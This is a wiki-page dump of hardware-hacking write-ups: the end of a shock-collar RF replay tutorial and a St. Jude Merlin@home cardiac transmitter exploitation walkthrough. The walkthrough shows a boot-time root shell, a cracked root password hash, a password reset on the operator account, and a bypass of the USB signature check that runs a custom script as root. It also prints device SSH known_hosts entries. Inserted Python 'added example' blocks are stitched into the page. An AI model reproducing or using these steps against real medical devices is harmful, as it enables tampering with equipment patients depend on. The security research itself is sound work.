<br />
[[File:URH_waveform_demod.png]]<br />
<br />
Knowing the approximate baud rate and our sample rate of 2 million samples per second, we can start to fiddle with the bit length and noise level to decode the packets. Things start to settle out at 500 samples per bit. That would give a baud rate of 4000 (2,000,000 / 500); it isn't accurate because of the rest of the tinkering, but it will let us decode the signal. More careful adjustment gets us closer to the actual rate of 555 samples per bit, or about 3600 baud. At this point we can retransmit these bits with the HackRF and trigger the device, but it doesn't give us a clear idea of what is actually going on.<br />
<br />
The bit pattern looks like it has some redundancy built in: a sequence of 1000 seems to represent a 0 and 1110 a 1. URH will let us decode this further, as seen below.<br />
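The two steps above (baud rate from samples per bit, then mapping the 4-chip groups 1000 and 1110 back to data bits) as an added worked example; this is not code from the page, from URH, or from the ShockCollar repository, and it also covers the identical paragraphs in the earlier revisions of this page above. It assumes the 2 Msps capture rate and the symbol mapping the page reports; the amplitude envelope it decodes is constructed, with imperfect on/off levels standing in for a real capture, and groups that match neither symbol are flagged instead of guessed, which is how the noisy rows on the page would surface.<br />

```python
"""Decode a demodulated OOK bit stream with the 4-chip symbol mapping.

Added example; not code from the page or the ShockCollar repository. Assumes
the mapping the page reports (1000 -> 0, 1110 -> 1) and the 2 Msps capture
rate. All sample data below is constructed.
"""

SAMPLE_RATE = 2_000_000  # samples per second, as used for the capture on the page

# Symbol table read off the URH screenshot: every data bit is sent as four raw bits.
SYMBOLS = {"1000": "0", "1110": "1"}
CHIPS_PER_BIT = 4


def baud_rate(samples_per_bit: float, sample_rate: int = SAMPLE_RATE) -> float:
    """Raw bit rate in baud from the samples-per-bit setting found in URH."""
    return sample_rate / samples_per_bit


def slice_ook(envelope: list[float], samples_per_bit: int, threshold: float = 0.5) -> str:
    """Turn an amplitude envelope into raw bits: a bit period whose mean
    amplitude exceeds the threshold is a 1 (carrier on), otherwise 0."""
    raw = []
    for start in range(0, len(envelope) - samples_per_bit + 1, samples_per_bit):
        period = envelope[start:start + samples_per_bit]
        raw.append("1" if sum(period) / samples_per_bit > threshold else "0")
    return "".join(raw)


def decode_raw_bits(raw: str) -> tuple[str, list[int]]:
    """Map each 4-bit group to a data bit. Groups matching neither symbol are
    emitted as 'x' and their indexes returned rather than silently guessed."""
    bits, bad = [], []
    usable = len(raw) - len(raw) % CHIPS_PER_BIT  # drop a trailing partial group
    for n in range(0, usable, CHIPS_PER_BIT):
        symbol = SYMBOLS.get(raw[n:n + CHIPS_PER_BIT])
        if symbol is None:
            bad.append(n // CHIPS_PER_BIT)
            bits.append("x")
        else:
            bits.append(symbol)
    return "".join(bits), bad


def encode_bits(bits: str) -> str:
    """Inverse mapping; used here only to build the constructed test vector."""
    inverse = {v: k for k, v in SYMBOLS.items()}
    return "".join(inverse[b] for b in bits)


def make_envelope(raw: str, samples_per_bit: int, on: float = 0.9, off: float = 0.1) -> list[float]:
    """Constructed amplitude envelope: each raw bit held for one bit period.
    The imperfect on/off levels stand in for a real, noisy capture."""
    return [on if c == "1" else off for c in raw for _ in range(samples_per_bit)]


def decode_capture(envelope: list[float], samples_per_bit: int) -> tuple[str, list[int]]:
    """Full chain: envelope -> raw bits -> data bits plus the indexes of bad groups."""
    return decode_raw_bits(slice_ook(envelope, samples_per_bit))


if __name__ == "__main__":
    print(f"500 samples/bit -> {baud_rate(500):.0f} baud; 555 -> {baud_rate(555):.0f} baud")
    payload = "10110010"  # constructed data bits
    print(decode_capture(make_envelope(encode_bits(payload), 500), 500))
    # A corrupted group in the middle is reported, not guessed:
    print(decode_raw_bits(encode_bits("10") + "1010" + encode_bits("1")))
```

The threshold in slice_ook is the same knob as URH's noise level: set it too low and noise bursts become 1s, too high and weak packets vanish. Anything that comes back as 'x' is worth re-examining in the waveform rather than editing by hand.<br />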
<br />
[[File:URH_NRZ_replace.png]]<br />
<br />
The resulting packets now look like this.<br />
<br />
[[File:Decoded_packets.png]]<br />
<br />
If we ignore the noise in rows 5 and 10, we can see a sequence forming. This sequence is the result of changing the power level setting on the remote control. With more changes and monitoring, the entire protocol can be decoded.<br />
<br />
[[File:Collar_protocol_packet.PNG]]<br />
<br />
== Sending our own data ==<br />
<br />
With this data we can now use a tool like the YARD Stick One to transmit our own packets to the device. I have posted the complete code here: https://github.com/rjmendez/ShockCollar</div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Remote.jpg&diff=2814File:Remote.jpg2017-08-06T21:46:44Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Collar_protocol_packet.PNG&diff=2813File:Collar protocol packet.PNG2017-08-06T21:42:40Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Decoded_packets.png&diff=2812File:Decoded packets.png2017-08-06T21:42:05Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:URH_NRZ_replace.png&diff=2811File:URH NRZ replace.png2017-08-06T21:41:41Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:URH_waveform_demod.png&diff=2810File:URH waveform demod.png2017-08-06T21:41:09Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Inspectrum_ook.png&diff=2809File:Inspectrum ook.png2017-08-06T21:40:40Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Inspect_ook_gr-fosphor.png&diff=2808File:Inspect ook gr-fosphor.png2017-08-06T21:39:28Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Inspect_ook_grc.png&diff=2807File:Inspect ook grc.png2017-08-06T21:39:04Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Shock_Collar.jpg&diff=2806File:Shock Collar.jpg2017-08-06T21:37:39Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:B4Z-RF400401_fccid.io.PNG&diff=2805File:B4Z-RF400401 fccid.io.PNG2017-08-06T21:36:11Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=SJM_Merlin_at_Home&diff=2702SJM Merlin at Home2017-05-15T01:48:56Z<p>Rjmendez: </p>
<hr />
<div>__FORCETOC__<br />
{{Disclaimer}}<br />
[[File:Merlin-at-home-1.jpg|100px|left|thumb]]<br />
[[Category:Medical]]<br />
This page will be dedicated to a general overview, descriptions, and information related to the St. Jude Medical Merlin@home Transmitter Model EX1150.<br />
<br />
== About ==<br />
The Merlin@home Transmitter is intended to pair with an Implantable Cardiac Defibrillator (ICD) or Pacemaker and upload the data to the Merlin.net patient care network for review by a physician.<br />
<br />
== Disassembly ==<br />
<gallery><br />
File:Merlin-front.jpg<br />
File:Merlin-back.jpg<br />
File:Merlin-side_usb.jpg<br />
File:Merlin-antenna1.jpg<br />
File:Merlin-antenna2.jpg<br />
File:Merlin-uart.jpg<br />
File:Merlin-uart2.jpg<br />
</gallery><br />
<br />
== UART ==<br />
A login console is presented on UART (3.3 V) at 115200 baud. The pinout for UART can be found below.<br />
<br />
<gallery><br />
File:Merlin-uart.jpg<br />
File:Merlin-uart2.jpg<br />
</gallery><br />
<br />
== Exploitation ==<br />
<br />
This device boots with the BLOB bootloader (https://sourceforge.net/projects/blob/) into a version of MontaVista Linux (https://en.wikipedia.org/wiki/MontaVista) with a restricted root login. It is possible to hijack init by interrupting the bootloader's autoboot and passing init=/bin/sh on the kernel command line, as shown below.<br />
<br />
<pre>Post device verification...<br />
Serial2In string: ATi0<br />
Serial2In string: <br />
56000<br />
Modem Post : Passed with retries = 0<br />
<br />
Time taken by POST : [1.197000] seconds<br />
nand_init: manuf=0x000000EC device=0x000000F1<br />
scanning for bad blocks...<br />
nand_check_blocks: nand_read_page() failed, addr=0x02B40000<br />
nand_check_blocks: nand_read_page() failed, addr=0x04B20000<br />
nand_check_blocks: nand_read_page() failed, addr=0x07660000<br />
<br />
Consider yourself BLOBed!<br />
<br />
blob version 2.0.5-pre2 for Tanto Basic Device<br />
Copyright (C) 1999 2000 2001 Jan-Derk Bakker and Erik Mouw<br />
blob comes with ABSOLUTELY NO WARRANTY; read the GNU GPL for details.<br />
This is free software, and you are welcome to redistribute it<br />
under certain conditions; read the GNU GPL for details.<br />
blob release: d20081014_platform_4_16<br />
Memory map:<br />
0x02000000 @ 0xc0000000 (32 MB)<br />
<br />
ram_post executing...<br />
Data Bus Test<br />
Address Bus Test<br />
Data Qualifer Test<br />
Device Test<br />
c0200000status_next, board type = RF board revision = (3)<br />
c1e00000r14_svc = 0x0000034d<br />
Autoboot in progress, press any key to stop ..<br />
Autoboot aborted<br />
Type "help" to get a list of commands<br />
blob> boot console=ttyMX0,115200n8 root=/dev/mtdblock6 ip=dhcp init=/bin/sh BOARD_REVISION=<br />
</pre><br />
<br />
We can pull some useful information from the device.<br />
<br />
<pre>sh-2.05a# cat /etc/passwd<br />
root:0q8h1Maw1oYAU:0:0:root:/root:/bin/bash<br />
bin:*:1:1:bin:/bin:<br />
daemon:*:2:2:daemon:/usr/sbin:<br />
sys:*:3:3:sys:/dev:<br />
adm:*:4:4:adm:/var/adm:<br />
lp:*:5:7:lp:/var/spool/lpd:<br />
sync:*:6:8:sync:/bin:/bin/sync<br />
shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown<br />
halt:*:8:10:halt:/sbin:/sbin/halt<br />
mail:*:9:11:mail:/var/spool/mail:<br />
news:*:10:12:news:/var/spool/news:<br />
uucp:*:11:13:uucp:/var/spool/uucp:<br />
operator:*:12:0:operator:/root:<br />
games:*:13:100:games:/usr/games:<br />
ftp:*:15:14:ftp:/var/ftp:<br />
man:*:16:100:man:/var/cache/man:<br />
www:*:17:100:www:/var/www:<br />
sshd:*:18:100:sshd:/var/run/sshd:<br />
nobody:*:65534:65534:nobody:/home:/bin/sh<br />
sh-2.05a# cat /etc/shadow<br />
cat: /etc/shadow: No such file or directory</pre><br />
<br />
Let's break this hash.<br />
<br />
<pre>E:\hashcat-3.5.0>hashcat64.exe --session sjm_hash -w 3 -m 1500 e:\sjm_hash -a 3 ?a?a?a?a?a?a?a<br />
hashcat (v3.5.0) starting...<br />
<br />
* Device #1: WARNING! Kernel exec timeout is not disabled.<br />
This may cause "CL_OUT_OF_RESOURCES" or related errors.<br />
To disable the timeout, see: https://hashcat.net/q/timeoutpatch<br />
OpenCL Platform #1: NVIDIA Corporation<br />
======================================<br />
* Device #1: GeForce GTX 980, 1024/4096 MB allocatable, 16MCU<br />
<br />
OpenCL Platform #2: Intel(R) Corporation<br />
========================================<br />
* Device #2: Intel(R) Core(TM) i5-4570 CPU @ 3.20GHz, skipped.<br />
<br />
Hashes: 1 digests; 1 unique digests, 1 unique salts<br />
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates<br />
<br />
Applicable optimizers:<br />
* Zero-Byte<br />
* Precompute-Final-Permutation<br />
* Not-Iterated<br />
* Single-Hash<br />
* Single-Salt<br />
* Brute-Force<br />
<br />
Watchdog: Temperature abort trigger set to 90c<br />
Watchdog: Temperature retain trigger set to 75c<br />
<br />
[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit =><br />
<br />
0q8h1Maw1oYAU:mah1200<br />
<br />
Session..........: sjm_hash<br />
Status...........: Cracked<br />
Hash.Type........: descrypt, DES (Unix), Traditional DES<br />
Hash.Target......: 0q8h1Maw1oYAU<br />
Time.Started.....: Sun May 07 17:39:55 2017 (9 secs)<br />
Time.Estimated...: Sun May 07 17:40:04 2017 (0 secs)<br />
Guess.Mask.......: ?a?a?a?a?a?a?a [7]<br />
Guess.Queue......: 1/1 (100.00%)<br />
Speed.Dev.#1.....: 544.7 MH/s (60.44ms)<br />
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts<br />
Progress.........: 4764729344/69833729609375 (0.01%)<br />
Rejected.........: 0/4764729344 (0.00%)<br />
Restore.Point....: 0/81450625 (0.00%)<br />
Candidates.#1....: ;~9anan -> $sb~{ka<br />
HWMon.Dev.#1.....: Temp: 67c Fan: 33% Util: 99% Core:1404MHz Mem:3004MHz Bus:16<br />
<br />
Started: Sun May 07 17:39:51 2017<br />
Stopped: Sun May 07 17:40:05 2017</pre><br />
<br />
Attempts to log in as root fail; so what was going on with that operator user?<br />
<br />
<pre>operator:*:12:0:operator:/root:</pre><br />
<br />
Let's set the operator password to "test" and attempt to log in.<br />
<br />
<pre>sh-2.05a# grep "operator" /etc/passwd<br />
operator:dPUvQFLH8...A:12:0:operator:/root:</pre><br />
<br />
<pre>[SJM_CONFIGURATION]<br />
VERSION=EX2000 v6.1B PR_6.56<br />
(none) login: root<br />
Password: <br />
Login incorrect<br />
2017-05-14 <br />
(none) login: operator<br />
Password: <br />
operator@(none):~$ whoami<br />
operator<br />
operator@(none):~$ su root<br />
Password: <br />
PAM_unix[266]: (su) session opened for user root by (uid=12)<br />
root@(none):~# whoami<br />
root<br />
root@(none):~# </pre><br />
<br />
== Taking Things Further ==<br />
<br />
Let's look at some of these custom hotplug scripts. /etc/hotplug/usb/sjmusb looks like a good start.<br />
<br />
<pre>#!/bin/bash<br />
#<br />
# Script to mount valid sjm pendrive(s) via hotplug. Hotplug will invoke <br />
# this script only if the attached USB device is a mass-storage device.<br />
# hotplug does this by looking at the device class of the attached usb device<br />
# See /etc/hotplug/usb.usermap. The device class for mass storage devices<br />
# is ______<br />
# <br />
# In a nutshell, the script looks in /proc/scsi/usb-storage* directory to<br />
# find the scsi ID of the attached USB storage device. It then goes on to<br />
# find the device node corresponding to this scsi ID.<br />
# <br />
# version 1.1 - Added USB signature check functionality <br />
#<br />
# For the new cellular adapters - viz mobidata and velocity, ignore the<br />
# mass storage interface reported. Please see comments at the top of<br />
# /etc/hotplug/usb/velocity for details.<br />
#<br />
# - Ashok Iyer (16-Jun-2010)<br />
#<br />
<br />
export PATH=/usr/bin:/usr/local/bin:$PATH<br />
<br />
MOUNT_PATH="/mnt/sjmpendrives"<br />
MOUNT_NUMBER=1<br />
LOG_FILE="/tmp/usbstorage.log"<br />
SGMAP="sg_map"<br />
<br />
<br />
# The functions in this script rely on "echo" to pass information to each<br />
# other. If you need to modify this script, do not use "echo" for debugging.<br />
# Instead use the feedback()/error_exit() functions below. These will log <br />
# information to a log file and do not interfere with information passing <br />
# between functions.<br />
<br />
***snip***<br />
<br />
function check_sign {<br />
local node1=$1"1"<br />
feedback "Checking signature ... "<br />
feedback "node1 = $node1"<br />
dd if=$node1 of=/tmp/.sign bs=1 count=3 skip=501<br />
signature=`cat /tmp/.sign` <br />
<br />
if [ "$signature" = "SJM" ]; then<br />
feedback "Valid pendrive"<br />
echo 0<br />
else<br />
feedback "Invalid pendrive"<br />
echo -1<br />
fi<br />
}<br />
<br />
***snip***<br />
<br />
# We only mount the first partition of a USB storage device. There is no <br />
# requirement to mount multiple partitions. Makes the job easy :-)<br />
function mount_scsi_dev {<br />
local scsi_dev=$1<br />
local mountpt=""<br />
<br />
# check if the first partition of the device is mounted <br />
if ! mount | egrep -q "^$scsi_dev"1"[[:space:]]" <br />
then<br />
mountpt=$(find_unused_mountpt) || error_exit "Failed to find a mount pt"<br />
mkdir -p "$mountpt" || error_exit "Failed to create mount pt $mountpt"<br />
<br />
# FIXME- Ugly hack to detect partitions on USB flash drive<br />
# Possible bug in Kernel and/or devfs. Either use devfs=nomount kernel cmdline<br />
# or fix devfs once and for all.<br />
# There is another problem in devfs that after the USB flash disk is removed<br />
# the corresponding devfs partitions (part1, part2 etc...) still show up. <br />
foobar=`ls -l $scsi_dev | awk '{print $11}'`<br />
dd if=/dev/$foobar of=/dev/null bs=1 count=1 <br />
<br />
# Checking USB signature<br />
ret=`check_sign $scsi_dev` <br />
if [ $ret -eq 0 ]; then<br />
feedback "Valid pendrive"<br />
else<br />
# Tanto: Inform the Exec App to show <br />
# an Invalid Media Error<br />
if [ -p /tmp/remoteInt.pipe ]; then<br />
echo "UsbHotplug InvalidMedia" > /tmp/remoteInt.pipe<br />
error_exit "Invalid pendrive"<br />
else<br />
echo "ERROR: /tmp/remoteInt.pipe does not exist!!!"<br />
fi<br />
fi<br />
<br />
feedback "Mounting $scsi_dev"1" on $mountpt"<br />
mount -t auto $scsi_dev"1" $mountpt<br />
if [ "$?" -eq 0 ]; then<br />
feedback "$scsi_dev"1" is now mounted on $mountpt"<br />
feedback "Launch application specific script" <br />
sh /etc/launch_appln.sh $mountpt<br />
else<br />
feedback "Mount error for $scsi_dev"<br />
fi<br />
else<br />
feedback "Ignoring $scsi_dev - already mounted"<br />
fi<br />
}<br />
<br />
# Find and mount all attached USB storage devices<br />
function mount_all_attached {<br />
local scsiuniqid=""<br />
feedback "Find and mount all attached usb storage devices"<br />
<br />
for scsiuniqid in $(allusb_scsiuniqid)<br />
do<br />
local scsidev="`diskdev_from_uniqid $scsiuniqid`"<br />
if [ "$scsidev" == "UNKNOWN" ]; then<br />
sleep 1<br />
fi<br />
mount_scsi_dev $scsidev<br />
done<br />
}<br />
<br />
***snip***<br />
<br />
<br />
# The remover script will be invoked when the device is removed. This is<br />
# useless in a way because umount will have no effect. The only benefit is<br />
# that the "mount" command will not show stale entries.<br />
<br />
# FIXME - Need to add specialized LOGIC to selectively umount USB flash drive <br />
# which is removed ( unlike umounting all attached USB flash drives )<br />
feedback "REM = $REMOVER"<br />
if [ -f $REMOVER ]; then<br />
echo '/bin/umount /mnt/sjmpendrives/*' >> $REMOVER<br />
else<br />
echo -e '#!/bin/sh\n/bin/umount /mnt/sjmpendrives/*' > $REMOVER<br />
fi<br />
<br />
# Inform the Export data script when pendrive is unplugged.<br />
echo -e '\nps -A | grep export_data \nif [ $? -eq 0 ]; then \n\tif [ -p /tmp/usbDataExport.pipe ]; then \n\t\t echo "Hotplug umount" > /tmp/usbDataExport.pipe \n\tfi\nfi' >> $REMOVER<br />
chmod a+x $REMOVER<br />
<br />
mount_all_attached</pre><br />
<br />
Let's look inside /etc/launch_appln.sh.<br />
<br />
<pre>#!/bin/sh<br />
<br />
if [ $# -ne 1 ]; then<br />
echo "usage: ./launch_appln.sh /mnt/pendrive"<br />
exit<br />
fi<br />
<br />
# FIXME <br />
# This script may be invoked by hotplug <br />
# Do not run the script if it is already running <br />
# updater or data export<br />
<br />
mountpt=$1<br />
script_path=/apps/tanto/<br />
<br />
if [ -f $mountpt/version.ini ]; then<br />
# call updater script<br />
echo "Launching updater script"<br />
if [ -f $mountpt/etc/init.d/upgrade_script.sh ]; then<br />
sh $mountpt/etc/init.d/upgrade_script.sh $mountpt > /tmp/debugUpdater.txt 2>&1<br />
umount /mnt/sjmpendrives/1<br />
umount /mnt/pendrive<br />
else<br />
umount /mnt/sjmpendrives/1<br />
umount /mnt/pendrive<br />
exit 0<br />
fi<br />
else<br />
# Call Data export script<br />
echo "Launching export data script"<br />
sh $script_path/export_data.sh $mountpt<br />
umount /mnt/sjmpendrives/1<br />
umount /mnt/pendrive<br />
fi</pre><br />
<br />
It looks like their pendrive "signature" is fairly easy to get around: it is just the three bytes "SJM" at offset 501 of the first partition, which any writable drive can carry.<br />
<br />
<pre>rjmendez@Reggie:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501<br />
3+0 records in<br />
3+0 records out<br />
3 bytes copied, 0.00116472 s, 2.6 kB/s<br />
rjmendez@Reggie:~/stjude_merlin$ hd /tmp/.sign <br />
00000000 00 00 00 |...|<br />
00000003<br />
rjmendez@Reggie:~/stjude_merlin$ hd .sign_mod<br />
00000000 53 4a 4d |SJM|<br />
00000003<br />
rjmendez@Reggie:~/stjude_merlin$ sudo dd if=.sign_mod bs=1 count=3 of=/dev/sdb1 bs=1 seek=501<br />
3+0 records in<br />
3+0 records out<br />
3 bytes copied, 0.00700994 s, 0.4 kB/s<br />
rjmendez@Reggie:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501<br />
3+0 records in<br />
3+0 records out<br />
3 bytes copied, 0.00123249 s, 2.4 kB/s<br />
rjmendez@Reggie:~/stjude_merlin$ hd /tmp/.sign <br />
00000000 53 4a 4d |SJM|<br />
00000003</pre><br />
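The check_sign and launch_appln.sh logic from the two scripts above, ported to Python as an added example alongside the kind of verification that would actually gate an update; this is not code from the page or from the device. check_sign() and select_action() follow what is visible in the scripts (three bytes at offset 501, version.ini selecting the updater); verify_update(), the .sig companion file and the DEVICE_KEY placeholder are assumed hardening, not something the device does, and every partition image and file set below is constructed.<br />

```python
"""Port of the Merlin@home pendrive checks, with a hardened alternative.

Added example; not code from the page or the device. check_sign() and
select_action() follow the logic visible in /etc/hotplug/usb/sjmusb and
/etc/launch_appln.sh on the page. verify_update(), UPDATE_TAG and DEVICE_KEY
are an assumed hardening. All inputs are constructed.
"""
import hashlib
import hmac

SIGNATURE_OFFSET = 501            # check_sign: dd if=$node1 ... bs=1 count=3 skip=501
SIGNATURE = b"SJM"
UPDATE_MARKER = "version.ini"     # launch_appln.sh: present -> run the updater
UPDATE_SCRIPT = "etc/init.d/upgrade_script.sh"
UPDATE_TAG = "etc/init.d/upgrade_script.sig"   # assumed companion file, not on the device

# Placeholder for a per-device secret kept in protected storage (assumption).
DEVICE_KEY = b"constructed-placeholder-device-key"


def check_sign(partition: bytes) -> bool:
    """Faithful port of check_sign: the only 'signature' is the three bytes at
    offset 501 of the first partition reading SJM. Any writable drive can carry it."""
    return partition[SIGNATURE_OFFSET:SIGNATURE_OFFSET + len(SIGNATURE)] == SIGNATURE


def select_action(files: dict[str, bytes]) -> str:
    """What launch_appln.sh decides from the mounted drive's contents: the
    updater script runs as root whenever version.ini is present beside it."""
    if UPDATE_MARKER in files:
        return "update" if UPDATE_SCRIPT in files else "unmount"
    return "export"


def update_tag(script: bytes, key: bytes = DEVICE_KEY) -> bytes:
    """HMAC-SHA256 over the whole update script (assumed hardening)."""
    return hmac.new(key, script, hashlib.sha256).digest()


def verify_update(script: bytes, tag: bytes, key: bytes = DEVICE_KEY) -> bool:
    """Constant-time comparison so the check cannot be probed byte by byte."""
    return hmac.compare_digest(update_tag(script, key), tag)


def select_action_hardened(files: dict[str, bytes], key: bytes = DEVICE_KEY) -> str:
    """Same decision tree, but the updater only runs when the script carries a
    valid tag; an unverified update is rejected rather than executed as root."""
    if UPDATE_MARKER not in files:
        return "export"
    script, tag = files.get(UPDATE_SCRIPT), files.get(UPDATE_TAG)
    if script is None or tag is None or not verify_update(script, tag, key):
        return "reject"
    return "update"


def demo_partition(marker: bytes = b"") -> bytes:
    """Constructed 1 KiB partition image, optionally with marker bytes at offset 501."""
    image = bytearray(1024)
    image[SIGNATURE_OFFSET:SIGNATURE_OFFSET + len(marker)] = marker
    return bytes(image)


if __name__ == "__main__":
    print("blank image passes check_sign:", check_sign(demo_partition()))
    print("image with SJM at 501 passes:", check_sign(demo_partition(b"SJM")))
    script = b"#!/bin/sh\necho update\n"
    drive = {UPDATE_MARKER: b"1", UPDATE_SCRIPT: script}
    print("original logic:", select_action(drive))
    print("hardened, no tag:", select_action_hardened(drive))
    drive[UPDATE_TAG] = update_tag(script)
    print("hardened, valid tag:", select_action_hardened(drive))
    drive[UPDATE_SCRIPT] = script + b"rm -rf /data\n"
    print("hardened, tampered script:", select_action_hardened(drive))
```

A keyed MAC is the minimum that turns the marker into a real check, and it still has the weakness that the key must live on every device; the standard design is a detached signature verified with a public key on the device, so that extracting one transmitter's flash does not let anyone produce updates for the rest.<br />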
<br />
Adding the required files to the drive, along with a small script.<br />
<br />
<pre>rjmendez@Reggie:/media/rjmendez/7A3B-B3C6$ ls -lahR<br />
.:<br />
total 36K<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 14 11:04 .<br />
drwxr-x---+ 8 root root 4.0K May 14 11:02 ..<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 etc<br />
-rw-r--r-- 1 rjmendez rjmendez 620 May 14 06:01 passwd<br />
-rw-r--r-- 1 rjmendez rjmendez 4 May 10 17:07 version.ini<br />
<br />
./etc:<br />
total 24K<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 .<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 14 11:04 ..<br />
drwxr-xr-x 2 rjmendez rjmendez 8.0K May 13 14:02 init.d<br />
<br />
./etc/init.d:<br />
total 24K<br />
drwxr-xr-x 2 rjmendez rjmendez 8.0K May 13 14:02 .<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 ..<br />
-rw-r--r-- 1 rjmendez rjmendez 771 May 13 18:27 upgrade_script.sh<br />
<br />
rjmendez@Reggie:/media/rjmendez/7A3B-B3C6$ cat etc/init.d/upgrade_script.sh <br />
#!/bin/sh<br />
function led_off {<br />
for i in `seq 0 7`;<br />
do<br />
ledControl -l$i -b0<br />
sleep 0.05<br />
done<br />
}<br />
<br />
function led_dim {<br />
for i in `seq 0 7`;<br />
do<br />
ledControl -l$i -b1<br />
sleep 0.05<br />
done<br />
}<br />
<br />
function led_bright {<br />
for i in `seq 0 7`;<br />
do<br />
ledControl -l$i -b2<br />
sleep 0.05<br />
done<br />
}<br />
<br />
function party_mode {<br />
counter=0<br />
while [ $counter -lt $1 ];<br />
do<br />
led_off<br />
sleep 0.05<br />
led_dim<br />
sleep 0.05<br />
led_bright<br />
sleep 0.05<br />
let counter=counter+1<br />
done<br />
}<br />
<br />
/etc/init.d/tantoapp stop<br />
#cp /mnt/sjmpendrives/1/passwd /etc/passwd<br />
echo "This worked!" > /root/diditwork.txt<br />
if [ -f /root/diditwork.txt ];<br />
then<br />
party_mode 15<br />
else<br />
echo "It did not work..."<br />
fi</pre><br />
<br />
This is the output that we get from the console.<br />
<br />
<pre>operator@(none):~$ su root<br />
Password: <br />
PAM_unix[265]: (su) session opened for user root by (uid=12)<br />
root@(none):~# hub.c: new USB device usb-mx2hci-2, assigned address 2<br />
scsi0 : SCSI emulation for USB Mass Storage devices<br />
Vendor: Lexar Model: USB Flash Drive Rev: 1100<br />
Type: Direct-Access ANSI SCSI revision: 02<br />
Attached scsi removable disk sda at scsi0, channel 0, id 0, lun 0<br />
SCSI device sda: 31285248 512-byte hdwr sectors (16018 MB)<br />
sda: Write Protect is off<br />
Partition check:<br />
/dev/scsi/host0/bus0/target0/lun0: p1<br />
modprobe: Can't locate module /dev/sg1<br />
modprobe: Can't locate module /dev/sg2<br />
modprobe: Can't locate module /dev/sg3<br />
modprobe: Can't locate module /dev/sg4<br />
modprobe: Can't locate module /dev/sg5<br />
modprobe: Can't locate module /dev/sdb<br />
modprobe: Can't locate module /dev/sdc<br />
modprobe: Can't locate module /dev/sdd<br />
modprobe: Can't locate module /dev/sde<br />
modprobe: Can't locate module /dev/sdf<br />
modprobe: modprobe: Can't locate module nls_cp437<br />
modprobe: modprobe: Can't locate module nls_iso8859-1<br />
modprobe: modprobe: Can't locate module nls_iso8859-1<br />
modprobe: modprobe: Can't locate module nls_iso8859-1<br />
ls /root<br />
devel_install.sh diditwork.txt setdev.sh setlog.sh<br />
root@(none):~# cat /root/diditwork.txt <br />
This worked!<br />
root@(none):~# cat /tmp/usbstorage.log <br />
+++ Starting USB (un)mounter script for device /proc/bus/usb/001/002<br />
REM = /var/run/usb/%proc%bus%usb%001%002<br />
Find and mount all attached usb storage devices<br />
usb proc-fs yields SCSI host number=0 - suffix with zeroes (kernel 2.4)<br />
Use sgmap to match 0:0:0:0.<br />
Waiting for device id to appear...<br />
SCSI disk for 0:0:0:0 is /dev/sda<br />
Checking /mnt/sjmpendrives/1<br />
Mountpoint /mnt/sjmpendrives/1 is free<br />
Checking signature ... <br />
node1 = /dev/sda1<br />
Valid pendrive<br />
Valid pendrive<br />
Mounting /dev/sda1 on /mnt/sjmpendrives/1<br />
/dev/sda1 is now mounted on /mnt/sjmpendrives/1<br />
Launch application specific script</pre><br />
<br />
== Party Mode Demo ==<br />
{{#ev:youtube|cNcGebu8NRs}}<br />
<br />
== Other Stuff to Look Into ==<br />
<br />
I doubt this device has been updated to the latest firmware, as I acquired it still wrapped in its packaging. As of January 2017, St. Jude Medical claims that a security patch has been applied to the newer firmware releases.<br />
<br />
Below are some interesting things that were found.<br />
<br />
DSA keys and known hosts:<br />
<pre>root@(none):~# cd /root/.ssh<br />
root@(none):~/.ssh# ls -lah<br />
drwx------ 2 root root 0 Jan 10 2013 .<br />
drwxrwxr-x 3 root root 0 May 15 00:10 ..<br />
-rw------- 1 root root 668 Nov 28 2012 id_dsa<br />
-rw-r--r-- 1 root root 601 Nov 28 2012 id_dsa.pub<br />
-rw-r--r-- 1 root root 719 Nov 28 2012 known_hosts<br />
root@(none):~/.ssh# cat known_hosts <br />
REDACTED.merlin.net,150.202.X.X ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAtfdoYdn5D/vsC4Pm25jBUXDzfXrj6O50O32UONPOnvKcb08acULYcx1bDyeRGcMBqKwEJdPUKdwAT2evf4jYVSa4JvDAHQWJo15s2igWO04veEYitV5i0NEqVs+vRTJAqM70iCIKkhtoGkjBBnJcntw6u/8vgKXkvqBx85WBULc=<br />
REDACTED.merlin.net,150.202.X.X ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA29HEmKtQ5RABmAWmZ3MdyO+wiQ1GGzuNneGnPPL8KF+SYLjHXaQViB32cibA9dSauMpb8zcwj7YSxtKfu4K1gcH5vUOsqW9BgDsZYv7zWk2OHb8vLs+NT083+YbzjZvr7oGz+1/TAzfXORsN9Gf+BQMsHyjiHOjVJ/vEIy2fp0E=<br />
